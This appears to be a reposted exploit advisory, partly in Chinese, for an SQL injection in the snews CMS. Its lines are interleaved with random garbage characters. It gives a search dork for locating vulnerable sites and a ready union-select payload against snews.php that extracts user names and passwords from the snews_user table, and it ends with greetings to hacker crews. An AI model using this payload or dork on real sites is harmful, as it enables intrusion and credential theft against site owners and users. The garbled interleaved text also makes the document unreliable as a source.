标题: CMS snews SQL Injection Vulnerability8 F+ h6 x* F' W( M
作者: By onestree
- {- u% l1 q. L下载地址 : http://snewscms.com/6 k/ o0 a1 h1 }. w
测试平台 : ubuntu 12.10 / win 7
9 H7 x" r$ t% D- T6 P0 ?关键词: inurl:"tanyakan pada rumput yang bergoyang"" c: _ M: f8 ]3 S5 \
2 A% A1 U3 r q5 F' r* Q e
! n, h+ e5 u# d- d; W3 K
*************************************************************
$ v [" e' w+ r# Z* q1 o/ {
( o. Y2 {! \' e6 aSQL poc:; s8 @, M* B; _- ]
6 B4 M) B4 i8 X2 C
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]% h0 a/ a& H; T0 m; v
) n- _" }, p1 M& F- n示例
. Q4 W3 V. e- ? 0 }9 {2 A: y% l0 Y
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*) u6 Y! W! c0 Q1 e! ]0 N
; S$ a8 b, s* w7 F7 O: y8 K
& _2 D4 t6 y3 R) G; `, [6 b' w
致谢:
6 r" a4 h8 M# _8 C- _
! a$ H& t0 R3 u# b/ e Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell9 A. o! G7 F: P9 ?! ? @
, Y# N0 c$ _3 A) ^9 L7 b: x) Y indonesiancoder - moeslimh4x0r - go-coder
/ e- f% ]# q; S4 i7 P
" G4 g7 L" ^3 @spesial my hunny :*" b4 @! Y' w- i; D( k2 Z3 s4 p* u$ h
|